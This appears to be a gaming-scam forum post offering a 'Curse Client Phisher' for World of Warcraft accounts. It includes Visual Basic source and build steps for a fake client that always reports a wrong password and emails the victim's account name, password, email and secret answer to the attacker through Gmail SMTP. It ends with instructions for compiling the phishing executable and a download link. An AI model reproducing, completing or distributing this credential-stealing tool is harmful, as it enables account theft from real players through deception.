Hey there,
i made an...as well as perfect
.. Curse Client Phisher.... please move it to wow scams :X sry
Pics:






Howto:
Just open the projectfile "WindowsApplication1" with Visual Studio 2008...
Go to Form1.vb and open code...
Its looking like:
Code:
MsgBox("Incorrect Passwort!")
If TextBox1.Text = "" Then
MsgBox("The account field is not filled in!")
End If
If TextBox2.Text = "" Then
MsgBox("The password field is not filled in!")
End If
Dim mail As New System.Net.Mail.MailMessage()
Dim SmtpServer As New SmtpClient
SmtpServer.Credentials = New Net.NetworkCredential("YOUR GMAIL", "YOUR GMAIL PW")
SmtpServer.Port = 587
SmtpServer.Host = "smtp.gmail.com"
SmtpServer.EnableSsl = True
mail.To.Add("EMAIL WILL BE SEND TO")
mail.From = New MailAddress("YOUR GMAIL. SAME AS ON THE TOP")
mail.Subject = "WoWAccount: " & TextBox1.Text
mail.Body = "Account: " & TextBox1.Text & vbNewLine & "Password: " & TextBox2.Text
SmtpServer.Send(mail)
Change the gmails to yours....
The Victim must reset his passwort because the program tells him, its incorrect....
Open Form7.vb and the code is like
Code:
Dim mail As New System.Net.Mail.MailMessage()
Dim SmtpServer As New SmtpClient
SmtpServer.Credentials = New Net.NetworkCredential("YOUR GMAIL", "YOUR GMAIL PW")
SmtpServer.Port = 587
SmtpServer.Host = "smtp.gmail.com"
SmtpServer.EnableSsl = True
mail.To.Add("EMAIL WILL BE SEND TO")
mail.From = New MailAddress("YOUR GMAIL. SAME AS ON THE TOP")
mail.Subject = "WoWAccount: " & TextBox1.Text
mail.Body = "Account: " & TextBox1.Text & vbNewLine & "email: " & TextBox2.Text & vbNewLine & "SQA: " & TextBox3.Text
SmtpServer.Send(mail)
MsgBox("The new Passwort is send to your e-Mail")
Me.Hide()
Again... change the emails to yours....
Finaly click "Project">"WindowsApplication1-Settings"...
click on compile and choose the desktop as the path...
click on "create" (or what ever it means in english :P.. its the first next to "project" on the right side...)
and again... click create...
and TADAAAAAAAAAA your phishing EXE is on your dectop 
DOWNLOAD
If you want to say thanks...
pleasy klick on: peterluztig1.my brute.com
i will earn 1 EP every fight 
sry if its incorrect to post those links :X
So on...
DICKUNDHAESSLICH